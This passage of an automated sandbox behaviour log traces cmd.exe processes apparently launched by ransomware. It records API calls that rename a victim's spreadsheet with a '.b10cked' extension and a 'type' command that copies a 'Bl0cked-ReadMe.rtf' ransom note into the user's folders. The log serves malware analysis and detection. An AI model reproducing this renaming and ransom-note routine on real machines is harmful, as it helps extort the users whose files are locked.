cchData=128 | out: lpLCData="0") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af6a0, cchData=128 | out: lpLCData="1") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.746] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.746] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.747] GetConsoleTitleW (in: lpConsoleTitle=0x2f0958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.747] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.748] _wcsicmp (_String1="move", _String2=")") returned 68 [0127.748] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0127.748] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0127.748] _wcsicmp (_String1="IF", _String2="move") returned -4 [0127.748] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0127.748] _wcsicmp (_String1="REM", _String2="move") returned 5 [0127.748] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0127.752] GetConsoleTitleW (in: lpConsoleTitle=0x1af398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.847] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0127.847] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0127.847] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0127.847] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0127.847] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0127.847] _wcsicmp (_String1="move", _String2="CD") returned 10 
[0127.847] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0127.847] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0127.847] _wcsicmp (_String1="move", _String2="REN") returned -5 [0127.847] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0127.847] _wcsicmp (_String1="move", _String2="SET") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0127.848] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0127.848] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="MD") returned 11 [0127.848] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0127.848] _wcsicmp (_String1="move", _String2="RD") returned -5 [0127.848] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0127.848] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0127.848] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0127.848] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0127.848] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0127.848] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="VER") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0127.848] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0127.848] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0127.848] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0127.848] _wcsicmp (_String1="move", _String2="START") returned -6 [0127.848] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0127.848] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0127.848] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0127.850] GetDriveTypeW (lpRootPathName="C:\\") 
returned 0x3 [0127.850] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af154, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af14c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af14c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0127.850] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) 
returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0127.851] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0127.852] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2=".") returned 52 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2="..") returned 52 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm~1.xls")) returned 0x20 [0127.852] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3020d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.852] SetErrorMode (uMode=0x0) 
returned 0x0 [0127.852] SetErrorMode (uMode=0x1) returned 0x0 [0127.852] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", nBufferLength=0x104, lpBuffer=0x1aeadc, lpFilePart=0x1aeac4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", lpFilePart=0x1aeac4*="BS0-NM~1.XLS") returned 0x48 [0127.852] SetErrorMode (uMode=0x0) returned 0x1 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x10 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2=".") returned 52 [0127.852] _wcsicmp (_String1="BS0-NM~1.XLS", _String2="..") returned 52 [0127.852] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm~1.xls")) returned 0x20 [0127.853] SetErrorMode (uMode=0x0) returned 0x0 [0127.853] SetErrorMode (uMode=0x1) returned 0x0 [0127.853] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", nBufferLength=0x104, lpBuffer=0x1aef58, lpFilePart=0x1aecf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", lpFilePart=0x1aecf0*="BS0-NM~1.XLS") returned 0x48 [0127.853] SetErrorMode (uMode=0x0) returned 0x1 [0127.853] SetErrorMode (uMode=0x0) returned 0x0 [0127.853] SetErrorMode (uMode=0x1) returned 0x0 [0127.853] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1af160, lpFilePart=0x1aecf0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", lpFilePart=0x1aecf0*="BS0-Nm2046.xlsx.b10cked") returned 0x53 
[0127.853] SetErrorMode (uMode=0x0) returned 0x1 [0127.853] SetLastError (dwErrCode=0x0) [0127.853] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx.b10cked")) returned 0xffffffff [0127.853] GetLastError () returned 0x2 [0127.853] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1ae66c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae66c) returned 0x3022e8 [0127.853] FindNextFileW (in: hFindFile=0x3022e8, lpFindFileData=0x1ae66c | out: lpFindFileData=0x1ae66c) returned 0 [0127.854] GetLastError () returned 0x12 [0127.854] FindClose (in: hFindFile=0x3022e8 | out: hFindFile=0x3022e8) returned 1 [0127.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x301e78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301e78) returned 0x3022e8 [0127.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked", lpFilePart=0x0) returned 0x53 [0127.856] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx", nBufferLength=0x104, lpBuffer=0x1ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx", lpFilePart=0x0) returned 0x4b [0127.856] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx")) returned 0x20 [0127.856] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bs0-nm2046.xlsx.b10cked"), dwFlags=0x3) returned 1 [0127.856] FindClose (in: hFindFile=0x3022e8 | out: hFindFile=0x3022e8) returned 1 [0127.857] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae8b8 | out: _Buffer=" 1") returned 9 [0127.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.857] GetFileType (hFile=0x7) returned 0x2 [0127.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae844 | out: lpMode=0x1ae844) returned 1 [0127.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae878 | out: lpConsoleScreenBufferInfo=0x1ae878) returned 1 [0127.857] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0127.858] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ae8b8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0127.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae89c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ae89c*=0x1a) returned 1 [0127.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.858] SetConsoleMode 
(hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.858] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.858] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.859] SetConsoleInputExeNameW () returned 0x1 [0127.859] GetConsoleOutputCP () returned 0x1b5 [0127.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.859] exit (_Code=0) Process: id = "81" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10373 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10374 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10375 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 10376 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10377 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10378 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10379 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10380 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10381 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 10382 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10417 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10418 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10419 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10420 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" 
filename = "" Region: id = 10421 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10422 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10423 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10424 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10425 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10426 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10427 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10428 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10429 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 
10430 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10431 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 10432 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10433 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10434 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10435 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10436 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10437 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10438 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 10439 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 10440 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 138 os_tid = 0x84c [0127.771] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f8ac | out: lpSystemTimeAsFileTime=0x28f8ac*(dwLowDateTime=0x86167380, 
dwHighDateTime=0x1d440a9)) [0127.771] GetCurrentProcessId () returned 0x83c [0127.771] GetCurrentThreadId () returned 0x84c [0127.771] GetTickCount () returned 0x28fff [0127.771] QueryPerformanceCounter (in: lpPerformanceCount=0x28f8a4 | out: lpPerformanceCount=0x28f8a4*=18456046653) returned 1 [0127.772] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.772] __set_app_type (_Type=0x1) [0127.772] __p__fmode () returned 0x76b331f4 [0127.772] __p__commode () returned 0x76b331fc [0127.772] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.772] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.772] GetCurrentThreadId () returned 0x84c [0127.772] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x84c) returned 0x38 [0127.772] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.772] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.772] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.772] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f83c | out: phkResult=0x28f83c*=0x0) returned 0x2 [0127.773] VirtualQuery (in: lpAddress=0x28f873, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 
0x1c [0127.773] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.773] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f80c, dwLength=0x1c | out: lpBuffer=0x28f80c*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0127.773] GetConsoleOutputCP () returned 0x1b5 [0127.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.773] 